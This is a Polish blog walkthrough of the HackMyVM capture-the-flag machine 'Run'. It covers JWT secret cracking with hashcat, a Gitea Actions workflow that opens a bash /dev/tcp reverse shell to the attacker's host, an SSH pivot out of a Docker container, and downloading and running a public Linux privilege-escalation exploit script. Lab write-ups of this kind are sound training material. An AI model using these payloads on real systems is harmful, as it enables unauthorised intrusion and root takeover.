Marcin

Marcin

Zajmuję się komputerami od lat 90. (XX wieku). Najpierw był C64, potem Amiga, a od 25 lat PC. Tematy tutaj poruszane będą różne, ale głównie związane z IT i wycieczkami rowerowymi.

Run - avijneyam

00. Metainfo

Title: Run
Author: avijneyam
Release date: 2024-03-05
Download from: HackMyVM
Level: Medium
System: Linux
You’ll learn: JWT, gitea, docker, CVE

01. Netdiscover

netdiscover -r 172.16.1.0 -P
# 172.16.1.124    08:00:27:5a:e2:0d      1      60  PCS Systemtechnik GmbH
export IP=172.16.1.124

02. Nmap

nmap $IP
# Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 18:33 CET
# Nmap scan report for run.lan (172.16.1.124)
# Host is up (0.0013s latency).
# Not shown: 999 closed tcp ports (reset)
# PORT     STATE SERVICE
# 3000/tcp open  ppp
# MAC Address: 08:00:27:5A:E2:0D (Oracle VirtualBox virtual NIC)

# Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

03. Git

git clone http://$IP:3000/dev/flask-jwt-auth.git
# Klonowanie do „flask-jwt-auth”...
# remote: Enumerating objects: 8, done.
# remote: Counting objects: 100% (8/8), done.
# remote: Compressing objects: 100% (8/8), done.
# remote: Total 8 (delta 1), reused 0 (delta 0), pack-reused 0
# Pobieranie obiektów: 100% (8/8), gotowe.
# Rozwiązywanie delt: 100% (1/1), gotowe.

cd flask-jwt-auth
git show
# commit 82a427e2170354c619fb6e47345b684e39c4627c (HEAD -> main, origin/main, origin/HEAD)
# Author: dev <dev@run.hmv>
# Date:   Mon Feb 5 16:02:46 2024 +0000

#     initial commit

# diff --git a/app.py b/app.py
# index 127edca..36f1d68 100644
# --- a/app.py
# +++ b/app.py
# @@ -7,14 +7,14 @@ from flask_jwt_extended import create_access_token, JWTManager, get_jwt_identity

#  app = Flask(__name__)
#  app.config['SECRET_KEY'] = "super_secret_key"
# -app.config['DEV_INSTANCE'] = True
# +app.config['DEV_INSTANCE'] = False
#  app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///database.db"

#  db = SQLAlchemy(app)
#  api = Api(app)
#  jwt = JWTManager(app)

# -jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"
# +jwt_token = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"

#  class User(db.Model):
#      id = db.Column(db.Integer, primary_key=True)

04. Hashcat

git show | grep  '\"eyJ.*' -o | tr -d "\"" > jwt.hash

hashcat -O -a 0 -m 16500 jwt.hash /usr/share/wordlists/rockyou.txt 
# hashcat (v6.2.6) starting

# OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
# ==================================================================================================================================================
# * Device #1: cpu-penryn-QEMU Virtual CPU version 2.5+, 6944/13953 MB (2048 MB allocatable), 8MCU

# Minimum password length supported by kernel: 0
# Maximum password length supported by kernel: 256

# Hashes: 1 digests; 1 unique digests, 1 unique salts
# Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
# Rules: 1

# Optimizers applied:
# * Zero-Byte
# * Not-Iterated
# * Single-Hash
# * Single-Salt

# Watchdog: Hardware monitoring interface not found on your system.
# Watchdog: Temperature abort trigger disabled.

# Host memory required for this attack: 2 MB

# Dictionary cache hit:
# * Filename..: /usr/share/wordlists/rockyou.txt
# * Passwords.: 14344385
# * Bytes.....: 139921507
# * Keyspace..: 14344385

# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o:******
                                                          
# Session..........: hashcat
# Status...........: Cracked
# Hash.Mode........: 16500 (JWT (JSON Web Token))
# Hash.Target......: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6Zm...SMwU_o
# Time.Started.....: Wed Mar  6 18:42:48 2024 (10 secs)
# Time.Estimated...: Wed Mar  6 18:42:58 2024 (0 secs)
# Kernel.Feature...: Pure Kernel
# Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
# Guess.Queue......: 1/1 (100.00%)
# Speed.#1.........:   873.1 kH/s (7.72ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
# Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
# Progress.........: 8667136/14344385 (60.42%)
# Rejected.........: 0/8667136 (0.00%)
# Restore.Point....: 8658944/14344385 (60.36%)
# Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
# Candidate.Engine.: Device Generator
# Candidates.#1....: devilchild160 -> desiree007

# Started: Wed Mar  6 18:42:47 2024
# Stopped: Wed Mar  6 18:42:59 2024

Now You have login i password for site (dev/**)

05. Gitea

01. Reverse Shell

nc -lvp 12345

02. Gitea

+create repository
-settings-> Actions-Enable Repository Actions [x]
<>Code->New file (.gitea/workflows/shell.yaml)

name: Reverse Shell
on: [push]
jobs:
  Run-Command:
    runs-on: run
    steps:
    - name: Execute Command
      run: |
        /bin/bash -i &> /dev/tcp/172.16.1.89/12345 0>&1

06. Docker

connect to [172.16.1.89] from run.lan [172.16.1.124] 49048
act@c1fcc2fa73ea:~/cache/actions/1ed8113a37c7a999/hostexecutor$ sudo su -
# sudo su -
script /dev/null -c bash
# Script started, output log file is '/dev/null'.
root@c1fcc2fa73ea:~# ^Z
[1]+  Zatrzymano              nc -lvp 12345
root@kali2023:~/hmv/run/flask-jwt-auth# stty raw -echo;fg
# nc -lvp 12345

root@c1fcc2fa73ea:~# ip route show
# default via 172.18.0.1 dev eth0 
# 172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4 
root@c1fcc2fa73ea:~# ssh dev@172.18.0.1
# The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
# ED25519 key fingerprint is SHA256:IGhXsYmgq4sTpoMPHq+MgSiAiNHWOR4ZkocqlvZPGis.
# This key is not known by any other names.
# Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
# Warning: Permanently added '172.18.0.1' (ED25519) to the list of known hosts.
# dev@172.18.0.1's password: 


# The programs included with the Ubuntu system are free software;
# the exact distribution terms for each program are described in the
# individual files in /usr/share/doc/*/copyright.

# Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
# applicable law.

# Last login: Tue Feb  6 15:52:41 2024 from 172.18.0.4
dev@run:~$

07. Root

dev@run:/tmp$ wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
# --2024-03-06 18:44:27--  https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh
# Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
# Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 558 [text/plain]
# Saving to: ‘exploit.sh’

# exploit.sh                                       0%[                                                                                      exploit.sh                                     100%[=================================================================================================>]     558  --.-KB/s    in 0s      

# 2024-03-06 18:44:27 (58.4 MB/s) - ‘exploit.sh’ saved [558/558]

dev@run:/tmp$ chmod +x exploit.sh 
dev@run:/tmp$ ./exploit.sh                                       
# [+] You should be root now
# [+] Type 'exit' to finish and leave the house cleaned

Zostaw komentarz

Także może Ci się spodobać